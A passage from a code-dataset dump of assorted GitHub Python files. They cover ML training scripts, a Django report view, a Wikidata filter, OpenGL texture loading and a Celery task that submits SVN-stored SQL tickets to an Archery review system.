lines.append((clean(datapoint[\"question\"]) + choices_string, answer_string))\n return lines\n\n def load_dataset(self):\n return datasets.load_dataset(\"commonsense_qa\")\n\ndef main():\n dataset = CommonsenseQA()\n\n for seed in [100, 13, 21, 42, 87]:\n train, dev, test = dataset.generate_k_shot_data(k=32, seed=seed, path=\"../data/\")\n\ndef main_more_shots():\n dataset = CommonsenseQA()\n\n for shots in [64, 128, 256, 512, 1024, 2048, 4096]:\n for seed in [100, 13, 21, 42, 87]:\n train, dev, test = dataset.generate_k_shot_data(k=shots, seed=seed, path=\"../data_more_shots/{}_shot\".format(str(shots)))\n\nif __name__ == \"__main__\":\n main()\n # main_more_shots()","repo_name":"INK-USC/CrossFit","sub_path":"tasks/commonsense_qa.py","file_name":"commonsense_qa.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"27"} +{"seq_id":"3237138648","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\n\ndef usergame_list(request):\n if request.method == 'GET':\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select g.id, g.name, g.maker,g.game_type_id,\n g.description,\n g.number_of_players,\n g.skill_level,\n u.id user_id,\n u.first_name || ' ' || u.last_name AS full_name\n from levelupapi_game g\n join levelupapi_gamer gr on g.gamer_id = gr.id\n join auth_user u on gr.user_id = u.id\n \"\"\")\n dataset = db_cursor.fetchall()\n\n games_by_user = {}\n\n for row in dataset:\n game = Game()\n game.name = row[\"name\"]\n game.maker = row[\"maker\"]\n game.skill_level = row[\"skill_level\"]\n game.number_of_players = row[\"number_of_players\"]\n game.game_type_id = row[\"game_type_id\"]\n game.description = row['description']\n\n uid = row['user_id']\n\n if uid in games_by_user:\n games_by_user[uid]['games'].append(game)\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row['full_name'],\n \"games\": [game]\n }\n list_of_users_with_games = games_by_user.values()\n\n template = 'users/list_with_games.html'\n context = {\n \"usergame_list\": list_of_users_with_games\n }\n\n return render(request, template, context)\n\n","repo_name":"nss-day-cohort-48/level-up-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2808637791","text":"\"csolid_hot.txt\"\nenergies = np.array([sec.potential_energy for sec in sections])\n\nprint(energies[0])\n\nX1 = groups[:,:,:3]/30\nX2 = groups[:,:,3:]/10\nY = energies / energies[0]\n\nX = (np.concatenate((X1, X2), axis=2))\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\n\nmodel = Sequential()\nmodel.add(Flatten(input_shape=(172, 6)))\nmodel.add(Dense(2000, activation='sigmoid'))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\nval_index = int(len(X) * 0.7)\n\nmodel.fit(X[:val_index], Y[:val_index], shuffle=True, validation_split=0.0)\n\nypred = (model.predict(X[val_index:]) * energies[0]).reshape((-1,))\nprint(ypred)\nytest = Y[val_index:]\n\nprint(np.corrcoef(ytest, ypred))","repo_name":"Sheyne/Topological-Chem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42174832158","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Takes './www.wikidata.org/' and remove nodes that have only out-coming\n# instanceOf edges.\n#\n# Input: 53.208.214 Output: 1.534.909\n#\n\nimport json\nimport itertools\nimport time\n\n\ndef main():\n start = time.process_time()\n nodes_to_keep = set()\n\n directory = \"../data/www.wikidata.org/\"\n output_file_name = \"wikidata-hierarchy-reduced.trie.jsonl\"\n\n print(\"Searching for inner nodes and nodes with subclassOf edge ..\")\n counter = 0\n with open(directory + \"wikidata-hierarchy.jsonl\") as input_stream:\n for line in input_stream:\n content = json.loads(line)\n instance = content.get(\"instanceof\", [])\n subclass = content.get(\"subclassof\", [])\n # Keep all inner nodes.\n for node_id in itertools.chain(instance, subclass):\n nodes_to_keep.add(node_id)\n # Keep those with subclass edge.\n if subclass:\n nodes_to_keep.add(content[\"id\"])\n counter += 1\n if counter % 250000 == 0:\n print(\" \", counter)\n total_count = counter\n print(f'Finished in {int(time.process_time() - start)} s')\n\n print(\"Creating output ....\")\n counter = 0\n with open(directory + \"wikidata-hierarchy.jsonl\") as input_stream, \\\n open(directory + output_file_name, \"w\") as output_stream:\n for line in input_stream:\n content = json.loads(line)\n if content[\"id\"] not in nodes_to_keep:\n continue\n if \"instanceof\" in content:\n content[\"instanceof\"] = filter_array(\n nodes_to_keep, content[\"instanceof\"])\n if \"subclassof\" in content:\n content[\"subclassof\"] = filter_array(\n nodes_to_keep, content[\"subclassof\"])\n output_stream.write(json.dumps(content))\n output_stream.write(\"\\n\")\n counter += 1\n if counter % 250000 == 0:\n print(\" \", counter)\n\n print(f'Input: {total_count} Output: {len(nodes_to_keep)}')\n print(f'Finished in {int(time.process_time() - start)} s')\n\n\ndef filter_array(items_to_keep, items):\n return [item for item in items if item in items_to_keep]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mff-uk/open-dataset-inspector","sub_path":"data-preparation/run_remove_instances.py","file_name":"run_remove_instances.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72099924553","text":"import gym\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom gym import wrappers\nfrom datetime import datetime\n\nfrom rl_gym.models.linear_models import RbfRegressor\nfrom rl_gym.models.mlp_models import FeedForwardModel\nfrom rl_gym.agents.qlearning_agent import QLearningFunctionAproximationAgent\n\nimport matplotlib.pyplot as plt\n\ndef create_model(env, verbose=False):\n obs = np.array([env.observation_space.sample()])\n obs_dim = obs.ndim\n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n model = RbfRegressor(in_size=obs_dim, num_features=1000, output_size=env.action_space.n, gammmas=[5.0, 2.0, 1.0, 0.5], verbose=verbose)\n model.fit_features(observation_examples, env)\n return model\n\ndef create_model(env, model_name, verbose=False):\n obs = env.reset()\n obs_dim = len(obs)\n if model_name == 'rbf':\n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n model = RbfRegressor(in_size=obs_dim, num_features=500, output_size=env.action_space.n, gammmas=[5.0, 2.0, 1.0, 0.5], verbose=verbose)\n model.fit_features(observation_examples, env)\n gamma = 0.99\n elif model_name == 'ff':\n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n model = FeedForwardModel(in_size=obs_dim, out_sizes=[128, 64, 32, env.action_space.n], normalize=False, verbose=verbose)\n model.fit_features(observation_examples)\n gamma = 0.99\n\n return model, gamma\n\ndef set_monitor(env):\n filename = os.path.basename(__file__).split('.')[0]\n monitor_dir = filename + '_' + str(datetime.now()).replace(' ', '_').replace(':', '_')\n monitor_dir = os.path.join(monitor_dir, os.pardir, os.pardir, os.pardir, 'temp')\n env = wrappers.Monitor(env, monitor_dir, force=True)\n\nnp.random.seed(0)\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n env.seed(0)\n verbose = False\n models = ['rbf', 'ff']\n model, gamma = create_model(env, models[0], verbose=verbose)\n agent = QLearningFunctionAproximationAgent(model=model, eps=0.0, eps_decay=0.99, gamma=gamma, verbose=verbose)\n\n monitor = True\n if monitor:\n set_monitor(env)\n\n num_iter = 40\n total_steps = 0\n returns = []\n for i in range(num_iter):\n print(\"Epoch %d\" % i)\n # if i == 23:\n # agent.verbose = True\n # else:\n # agent.verbose = False\n steps, tot_ret, last_reward = agent.single_episode_train(env)\n total_steps += steps\n returns.append(tot_ret)\n # if i > 0 and (i % 50 == 0):\n # model.adjust()\n print('Episode finished in %d steps. Return %f.' % (steps, tot_ret))\n\n env.close()\n\n cum_returns = (pd.DataFrame(returns, columns=['r'])).r.rolling(window=100).mean()\n\n print(\"Last 100 episode average reward %f\" % np.mean(returns[-100:]))\n\n fig, ax = plt.subplots()\n ax.plot(returns, label='Returns')\n ax.plot(cum_returns, label='Cumulative return')\n\n plt.show()\n print('Done')","repo_name":"ynahshan/deep_rl_experiments","sub_path":"rl_gym/experiments/mountain_car.py","file_name":"mountain_car.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"26598187994","text":"import io\nimport os\nimport sys\nimport pkgutil\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\n\n\ndef init():\n \"\"\"Set relevant OpenGL options\"\"\"\n # fill default texture with white\n glBindTexture(GL_TEXTURE_2D, 0)\n glTexImage2D(\n GL_TEXTURE_2D, 0, GL_RGBA, 1, 1, 0, GL_RGBA, GL_FLOAT,\n [1., 1., 1., 1.] # opaque white pixel\n )\n\n\ntry:\n from PIL import Image\nexcept ImportError:\n print(\"Install python3-pil for textures\", file=sys.stderr)\n\n def load(*_, **__):\n \"\"\"No texture can be loaded with PIL; return dummy texture 0\"\"\"\n return 0\n\n def load_cubemap(*path):\n return 0\nelse:\n def load_image(*path):\n \"\"\"Return raw picels from file at given path (join arguments)\"\"\"\n filename = os.path.join(\"data\", \"textures\", *path)\n try:\n image = pkgutil.get_data(\"gspyce\", filename)\n except FileNotFoundError:\n print(\"Missing %s\" % filename, file=sys.stderr)\n return None, None, None\n\n im = Image.open(io.BytesIO(image))\n w, h = im.size\n # \n # orientation=-1 ⇒ first row at bottom (as OpenGL expects)\n data = im.convert(\"RGBA\").tobytes(\"raw\", \"RGBA\", 0, -1)\n return w, h, data\n\n def load(*path):\n \"\"\"Make texture from file at given path (join arguments)\n\n If loading the file fails, return dummy texture 0\"\"\"\n w, h, data = load_image(*path)\n if data is None:\n return 0\n\n new_tex = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, new_tex)\n glTexImage2D(\n GL_TEXTURE_2D, 0, GL_RGBA, w, h, 0, GL_RGBA, GL_UNSIGNED_BYTE, data\n )\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n return new_tex\n\n def load_cubemap(*path):\n \"\"\"Create a cubemap\n\n Arguments are joined together to make the paths to the textures. Last\n argument should be a pattern with a \"%s\", which will be completed as\n \"PositiveX\", \"NegativeY\" and so on.\"\"\"\n\n texture = glGenTextures(1)\n glBindTexture(GL_TEXTURE_CUBE_MAP, texture)\n path, file_pattern = list(path[:-1]), path[-1]\n faces = [\"PositiveX\", \"NegativeX\",\n \"PositiveY\", \"NegativeY\",\n \"PositiveZ\", \"NegativeZ\"]\n for i, face in enumerate(faces):\n full_path = path + [file_pattern % face]\n w, h, data = load_image(*full_path)\n if data is None:\n continue\n glTexImage2D(\n GL_TEXTURE_CUBE_MAP_POSITIVE_X + i,\n 0, GL_RGBA, w, h, 0, GL_RGBA, GL_UNSIGNED_BYTE, data\n )\n glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glBindTexture(GL_TEXTURE_CUBE_MAP, 0)\n\n return texture\n","repo_name":"qsantos/spyce","sub_path":"gspyce/textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"27"} +{"seq_id":"27961509685","text":"import argparse\nimport json\nfrom pathlib import Path\nfrom typing import Iterable, Union\n\nimport numpy as np\n\n\ndef summarize_trials(output_dir: Union[Path, str]) -> dict:\n result_paths = list(Path(output_dir).glob('*/result.json'))\n if not result_paths:\n print(f'unable to find any completed trial under {output_dir}')\n return\n divs = np.zeros(len(result_paths), dtype=np.float32)\n cors = np.zeros(len(result_paths), dtype=np.float32)\n for i, result_path in enumerate(result_paths):\n with result_path.open('r') as f:\n result = json.load(f)\n divs[i] = result['div']\n cors[i] = result['cor']\n print(f'Summary for trials under {output_dir}')\n print(f'Result averaged over {len(result_paths)} trial(s):')\n print(f'div: {divs.mean():.4f} +/- {divs.std():.4f}')\n print(f'cor: {cors.mean():.4f} +/- {cors.std():.4f}')\n summary = {\n 'completed_trials': [path.parent.name for path in result_paths],\n 'result': {\n 'div': {'mean': float(divs.mean()), 'std': float(divs.std())},\n 'cor': {'mean': float(cors.mean()), 'std': float(cors.std())},\n }\n }\n with Path(output_dir, 'summary.json').open('w') as f:\n json.dump(summary, f)\n return summary\n\n\ndef summarize_sets(output_dirs: Iterable[Union[Path, str]]) -> dict:\n div_avgs, cor_avgs = [], []\n div_stds, cor_stds = [], []\n n_trials = []\n summaries = {}\n for output_dir in output_dirs:\n summary = summarize_trials(output_dir)\n if summary is None:\n continue\n div_avgs.append(summary['result']['div']['mean'])\n cor_avgs.append(summary['result']['cor']['mean'])\n div_stds.append(summary['result']['div']['std'])\n cor_stds.append(summary['result']['cor']['std'])\n n_trials.append(len(summary['completed_trials']))\n summaries[output_dir] = summary\n div_avgs, cor_avgs = map(np.array, (div_avgs, cor_avgs))\n div_stds, cor_stds = map(np.array, (div_stds, cor_stds))\n n_trials = np.array(n_trials)\n avg_div_std = sum(div_stds * n_trials / sum(n_trials))\n avg_cor_std = sum(cor_stds * n_trials / sum(n_trials))\n print(f'Overall statistics of {len(summaries)} sets of trials:')\n print(f'set-average div: {div_avgs.mean():.4f} +/- ({avg_div_std:.4f})')\n print(f'set-average cor: {cor_avgs.mean():.4f} +/- ({avg_cor_std:.4f})')\n return summaries\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_dirs', type=str, nargs='+', required=True)\n args = parser.parse_args()\n if len(args.output_dirs) == 1:\n summarize_trials(args.output_dirs[0])\n else:\n summarize_sets(args.output_dirs)","repo_name":"m-Just/OoD-Bench","sub_path":"ood_bench/scripts/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"27"} +{"seq_id":"71864162313","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass CNN_Text(nn.Module):\n def __init__(self, args, tokenizer, num_labels):\n super().__init__()\n self.args = args\n self.class_num = num_labels\n self.kernel_num = args.kernel_num\n if isinstance(args.kernel_sizes, list):\n self.kernel_sizes = args.kernel_sizes # list of kernel sizes\n else: \n self.kernel_sizes = [int(x) for x in args.kernel_sizes.split(',')] \n self.in_channels = 1\n self.metric_fc_dim = 50\n\n # Load pre-trained embedding\n self.embed = nn.Embedding.from_pretrained(torch.from_numpy(tokenizer.embs_npa).float(), \n padding_idx=tokenizer.pad_token_id, freeze=False) \n\n self.convs = nn.ModuleList(\n [nn.Conv2d(self.in_channels, self.kernel_num, (K, tokenizer.embs_npa.shape[1])) for K in self.kernel_sizes]\n )\n '''\n self.conv13 = nn.Conv2d(Ci, Co, (3, D))\n self.conv14 = nn.Conv2d(Ci, Co, (4, D))\n self.conv15 = nn.Conv2d(Ci, Co, (5, D))\n '''\n self.dropout = nn.Dropout(args.dropout)\n self.fc = nn.Linear(len(self.kernel_sizes) * self.kernel_num, self.class_num)\n\n if args.ensemble:\n self.embed2 = nn.Embedding.from_pretrained(torch.from_numpy(tokenizer.embs_npa).float(), \n padding_idx=tokenizer.pad_token_id, freeze=False) \n\n self.convs2 = nn.ModuleList(\n [nn.Conv2d(self.in_channels, self.kernel_num, (K, tokenizer.embs_npa.shape[1])) for K in self.kernel_sizes]\n )\n self.dropout2 = nn.Dropout(args.dropout)\n self.fc2 = nn.Linear(len(self.kernel_sizes) * self.kernel_num, self.class_num)\n\n\n def conv_and_pool(self, x, conv):\n x = F.relu(conv(x)).squeeze(3) # (N, Co, W)\n x = F.max_pool1d(x, x.size(2)).squeeze(2)\n return x\n\n def forward(self, x):\n x1 = self.embed(x) # (N, W, D)\n if self.args.static:\n x1 = Variable(x1)\n\n x1 = x1.unsqueeze(1) # (N, Ci, W, D)\n x1 = [F.relu(conv(x1)).squeeze(3) for conv in self.convs] # [(N, Co, W), ...]*len(Ks)\n x1 = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x1] # [(N, Co), ...]*len(Ks)\n x1 = torch.cat(x1, 1) # (N, len(Ks)*Co)\n x1 = self.dropout(x1) # (B, len(Ks)*Co)\n logit1 = self.fc(x1) # (B, V)\n\n if self.args.ensemble:\n x2 = self.embed2(x) # (N, W, D)\n if self.args.static:\n x2 = Variable(x2)\n\n x2 = x2.unsqueeze(1) # (N, Ci, W, D)\n x2 = [F.relu(conv(x2)).squeeze(3) for conv in self.convs2] # [(N, Co, W), ...]*len(Ks)\n x2 = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x2] # [(N, Co), ...]*len(Ks)\n x2 = torch.cat(x2, 1) # (N, len(Ks)*Co)\n x2 = self.dropout2(x2) # (B, len(Ks)*Co)\n logit2 = self.fc2(x2) # (B, V)\n\n return x1, logit1, x2, logit2 \n \n return x1, logit1","repo_name":"yul091/UncertaintyNLP","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3690852697","text":"from celery import shared_task\nfrom datetime import timedelta\nimport json\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom cicdflow.models import CICDState\nfrom cicdflow.views import d_logger\nfrom util.archery_operate import ArcheryAPI, archery_config\nfrom util.svn_client import SvnClient\nfrom util.redis_client import RedisClient\n\n\"\"\"\"\n定时获取所有 SQL 状态 2 & 3 的工作流\n 状态为3时:提交 SQL 工单到 Archery,待 DBA 审核执行,并将状态置为2\n 状态为2时:调用 Archery 接口获取 SQL 工单执行结果\n -> 成功置为0\n -> 失败置为1\n 状态为0/1/9时:忽略/发出通知?\n\"\"\"\n@shared_task\ndef sqlstate_task() -> None:\n # 初始化实例\n redis_client = RedisClient().redis_client\n archery_api = ArcheryAPI()\n schema = archery_config['schema']\n\n # 获取当前 sql_state 为 3 的待执行工作流,轮训每个工作流提交 SQL 工单\n waiting_execute = CICDState.objects.filter(flow_state=3, sql_state=3)\n for i in range(len(waiting_execute)):\n try:\n we_ins = waiting_execute.get(id=waiting_execute.values()[i]['id'])\n # 已邮件标题作为 key 唯一值,每个 value 为 dict ,key 为 workflow_name 唯一值\n email_title = we_ins.email_title.email_title\n # 不存在 redis key,首次提交 SQL 工单\n # 失败工单存入 redis 队列,重复执行时只继续提交失败工单,直到所有工单成功将 sql_state 置为 2\n if not redis_client.llen(email_title):\n # 获取提交 SQL 工单所需参数\n archery_data_list = []\n run_date_start = we_ins.update_date.strftime('%Y-%m-%dT%H:%M:%S')\n run_date_end = (we_ins.update_date + timedelta(days=3)).strftime('%Y-%m-%dT%H:%M:%S')\n sql_info_list = we_ins.email_title.sql_info\n for sql_info in sql_info_list:\n svn_path = sql_info['svn_path'].replace('10.138.200.100', '172.20.5.112')\n svn_sub_path = svn_path.split('/')[-1]\n svn_version = sql_info['svn_version']\n svn_file_name = sql_info['svn_file']\n\n workflow_name = f\"{email_title}-{svn_version}-{svn_file_name.split('.')[0]}\"\n # 根据 svn 路径判断是否提交工单,只提交当前 Archery 已有的 DB 实例\n try:\n schema_info = schema[svn_sub_path]\n group_id = schema_info['group_id']\n instance_id = schema_info['instance_id']\n db_name = schema_info['db_name']\n except KeyError:\n d_logger.info(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} DB 不存在于当前 Archery 已有实例,库名:<{svn_sub_path}>\")\n continue\n svn_obj = SvnClient(svn_path)\n sql_content_value = svn_obj.get_file_content(revision=svn_version, filename=svn_file_name)\n tmp_data = (workflow_name, group_id, instance_id, db_name, sql_content_value)\n archery_data_list.append(tmp_data)\n\n # 调用 ArcheryAPI 实例方法,提交 SQL 工单\n assert archery_data_list, f\"升级邮件: <{email_title}> 所有 SQL DB 都不存在于当前 Archery 已有实例,不提交 Archery,人工处理 SQL\"\n for archery_data in archery_data_list:\n workflow_data = {\n 'workflow_name': archery_data[0],\n 'demand_url': archery_data[0],\n 'group_id': archery_data[1],\n 'instance_id': archery_data[2],\n 'db_name': archery_data[3],\n 'run_date_start': run_date_start,\n 'run_date_end': run_date_end,\n 'sql_content': archery_data[4]\n }\n submit_result = archery_api.submit_sql_ticket(**workflow_data)\n # 提交失败的 SQL 工单存入 redis 队列\n if not submit_result['code']:\n print(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} 提交成功。响应消息:{submit_result['msg']}\")\n else:\n print(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} 提交失败。响应消息:{submit_result['msg']}\")\n redis_client.rpush(email_title, json.dumps(workflow_data))\n # redis 队列为空,所有待执行 SQL 工单都提交成功,sql_state 状态置为2\n if not redis_client.llen(email_title):\n redis_client.delete(email_title)\n we_ins.sql_state = 2\n we_ins.save()\n # 存在 redis key,有失败 SQL 工单。获取 redis 队列中所有元素重新提交,提交成功删除队列数据,提交失败将数据放回队列待下次定时任务执行\n else:\n for i in range(redis_client.llen(email_title)):\n # 重复提交失败的 SQL 工单,如提交成功从队列移除,提交失败重新放回队列尾部\n workflow_data = redis_client.lpop(email_title)\n submit_result = archery_api.submit_sql_ticket(**json.loads(workflow_data))\n if not submit_result['code']:\n print(f\"升级邮件: <{email_title}> ,SQL 工单: <{submit_result['workflow_name']}> 提交成功。响应消息:{submit_result['msg']}\")\n else:\n print(f\"升级邮件: <{email_title}> ,SQL 工单: <{submit_result['workflow_name']}> 提交失败。响应消息:{submit_result['msg']}\")\n redis_client.rpush(email_title, workflow_data)\n if not redis_client.llen(email_title):\n redis_client.delete(email_title)\n we_ins.sql_state = 2\n we_ins.save()\n except AssertionError as err:\n we_ins.sql_state = 1\n we_ins.save()\n d_logger.error(err.__str__())\n except ObjectDoesNotExist:\n msg = f'当前升级邮件没有待执行 SQL 工单(sql_state=3),忽略本次任务'\n d_logger.info(msg)\n except Exception as err:\n msg = f'当前升级邮件待执行 SQL 工单: <{email_title}> 提交失败或异常,异常信息:{err.__str__()}'\n d_logger.info(msg)\n # 执行中 SQL 工单,调用 Archery 接口获取工单执行结果\n # in_progress = CICDState.objects.filter(flow_state=3, sql_state=2)\n # for i in range(len(in_progress)):\n # try:\n # ip_ins = in_progress.get(id=in_progress.values()[i]['id'])\n # # TODO: 获取状态更新 sql_state,发送邮件\n # print('执行中 SQL 工单....')\n # except ObjectDoesNotExist:\n # print('当前没有执行中 SQL 工单(sql_state=2),忽略本次任务')\n # except Exception as err:\n # print(f'执行中 SQL 工单获取状态失败或异常,异常信息:{err.__str__()}')\n\n# 定时获取所有代码为待执行状态的工作流,提交到 CMDB 升级代码(过滤 SQL、config、Apollo 都已执行成功的工作流才执行此任务)\n# @shared_task\n# TODO: 定时任务升级代码功能\n# def projectstate_task() -> None:\n# try:\n# cicdflow_state = CICDState.objects.filter(flow_state=3, project_state=3, sql_state=0, config_state=0, apollo_state=0)\n# print(cicdflow_state)\n# d_logger.info(cicdflow_state)\n# except CICDState.DoesNotExist:\n# d_logger.info('当前没有需执行代码升级邮件,忽略本次任务....')\n# except Exception as err:\n# print(f'task error: {err}')\n# return None\n\"\"\"\nDear All:\n\n1、升级开始时间:2023年01月30日 16:40\n2、升级完成时间:2023年01月30日 17:06\n3、升级人:SAD\n4、以下内容已经升级完成:\n \nUAT_A18_KRATOS_FRONTEND_V3\n \n5、预计升级运营 12 ~ 20 分钟。\n\"\"\"","repo_name":"yakir3/devops_tools","sub_path":"cicdflow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21661610201","text":"from collections import Counter\nfrom itertools import count\n\na = Counter('welcome to python')\nc = a.most_common(2)\nd = list(a.elements())\nprint(d)\n\nprint(c)\n\n'''for i,J in a.items():\n if J > 1 :\n print(i)'''\n\n\n\n \n","repo_name":"vemsekhar/pyselenium","sub_path":"practice/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22387323867","text":"import os\nimport sys\nimport subprocess\nimport argparse\nimport json\nimport numpy as np\nfrom numpy import genfromtxt\nfrom matplotlib import pyplot as plt\nimport pprint\npprint = pprint.pprint\n\n\nLOAD_DIR = \"/app/pyhanabi/wandb_data\"\nSPLIT_NAME = {\n \"six\": \"6-7 Splits\", \n \"one\": \"1-12 Splits\", \n \"eleven\": \"11-2 Splits\"\n}\n\n\ndef plot_mean_logs(args):\n model_names = get_names(args)\n pprint(model_names)\n\n data = load_data(args, model_names)\n\n plot_data(args, data)\n\n\ndef get_names(args):\n split_ids = parse_number_list(args.splits)\n splits_file = f\"train_test_splits/sad_splits_{args.split_type}.json\"\n splits = load_json_list(splits_file)\n\n model_names = []\n\n for split_i in split_ids:\n indexes = splits[split_i][\"train\"]\n indexes = [x + 1 for x in indexes]\n idx_str = '_'.join(str(x) for x in indexes)\n\n name = f\"{args.model}_sad_{args.split_type}_{idx_str}\"\n model_names.append(name)\n\n return model_names\n\ndef parse_number_list(game_seeds):\n if '-' in game_seeds:\n seed_range = [int(x) for x in game_seeds.split('-')]\n assert(len(seed_range) == 2)\n game_seed_list = list(np.arange(*seed_range))\n else:\n game_seed_list = [int(x) for x in game_seeds.split(',')]\n\n return game_seed_list\n\n\ndef load_data(args, model_names):\n all_data = {}\n\n all_model_data = []\n\n for name in model_names:\n load_path = os.path.join(LOAD_DIR, name + \".csv\")\n data = genfromtxt(load_path, delimiter=',')\n data = np.delete(data, 0, axis=0)\n\n all_model_data.append(data)\n\n mean_data = np.mean(all_model_data, axis=0)\n sem_data = np.std(all_model_data, axis=0) / np.sqrt(len(all_model_data))\n print(\"mean data:\", mean_data.shape)\n print(mean_data)\n print(\"sem data:\", sem_data.shape)\n print(sem_data)\n\n # for i, word in enumerate([\"test\", \"train\"]):\n for i, dataset in enumerate([\"test\", \"train\"]):\n mean = mean_data[:, i]\n stderr_high = mean + sem_data[:, i]\n stderr_low = mean - sem_data[:, i]\n\n all_data[f\"{dataset}_mean\"] = mean\n all_data[dataset + \"_stderr_high\"] = stderr_high\n all_data[dataset + \"_stderr_low\"] = stderr_low\n\n return all_data\n\n\ndef plot_data(args, data):\n epochs = np.arange(0, args.num_samples)\n\n test_idx = 0\n train_idx = 1\n\n datasets = []\n if args.test:\n datasets.append(\"test\")\n if args.train:\n datasets.append(\"train\")\n colours = {\"train\": \"blue\", \"test\": \"green\"}\n\n for dataset in datasets:\n mean = data[f\"{dataset}_mean\"]\n stderr_high = data[f\"{dataset}_stderr_high\"]\n stderr_low = data[f\"{dataset}_stderr_low\"]\n \n plt.plot(epochs, mean, label=dataset, color=colours[dataset])\n plt.fill_between(epochs, stderr_high, stderr_low, \n alpha=0.3, color=colours[dataset])\n\n split_name = SPLIT_NAME[args.split_type]\n plt.title(f\"{args.model.upper()} Training Curves, {split_name}\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Score\")\n plt.legend(loc=\"best\")\n plt.show()\n\n\ndef load_json_list(path):\n if path == \"None\":\n return []\n file = open(path)\n return json.load(file)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, default=\"br\")\n parser.add_argument(\"--splits\", type=str, default=\"0\")\n parser.add_argument(\"--split_type\", type=str, default=\"six\")\n parser.add_argument(\"--num_samples\", type=int, default=1000)\n parser.add_argument('--test', type=int, default=1)\n parser.add_argument('--train', type=int, default=1)\n parser.parse_args()\n args = parser.parse_args()\n\n plot_mean_logs(args)\n\n","repo_name":"ravihammond/symmetry-breaking-augmentations","sub_path":"pyhanabi/plot_mean_logs.py","file_name":"plot_mean_logs.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14154845097","text":"import torch\nfrom torch.utils.data.sampler import SubsetRandomSampler as sps\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\nimport numpy as np\n\n\ndef getdataloader(args):\n # Define the transformet to be used on the data\n transform = transforms.Compose([transforms.ToTensor(),transforms.Normalize((0.5,), (0.5,)),])\n\n # Get the data and use the transformations on them\n train_data = datasets.MNIST('data', train=True, download=True, transform=transform)\n test_data = datasets.MNIST('data', train=False, download=True, transform=transform)\n\n # Split the data in to test and train sets\n indices = np.arange(len(train_data))\n train_indeces = np.random.choice(indices, int(0.8*len(indices)), replace=False)\n test_indeces = np.array(list(set(indices) - set(train_indeces)))\n\n # Create a sampler to sample from the sets\n train_sampler = sps(train_indeces)\n valid_sampler = sps(test_indeces)\n\n # Create loaders to retrieve data in batches\n train_loader = DataLoader(train_data, batch_size = args.batch_size, sampler=train_sampler)\n val_loader = DataLoader(train_data, batch_size = args.batch_size, sampler=valid_sampler)\n test_loader = DataLoader(test_data, batch_size = args.batch_size)\n\n return train_loader, val_loader, 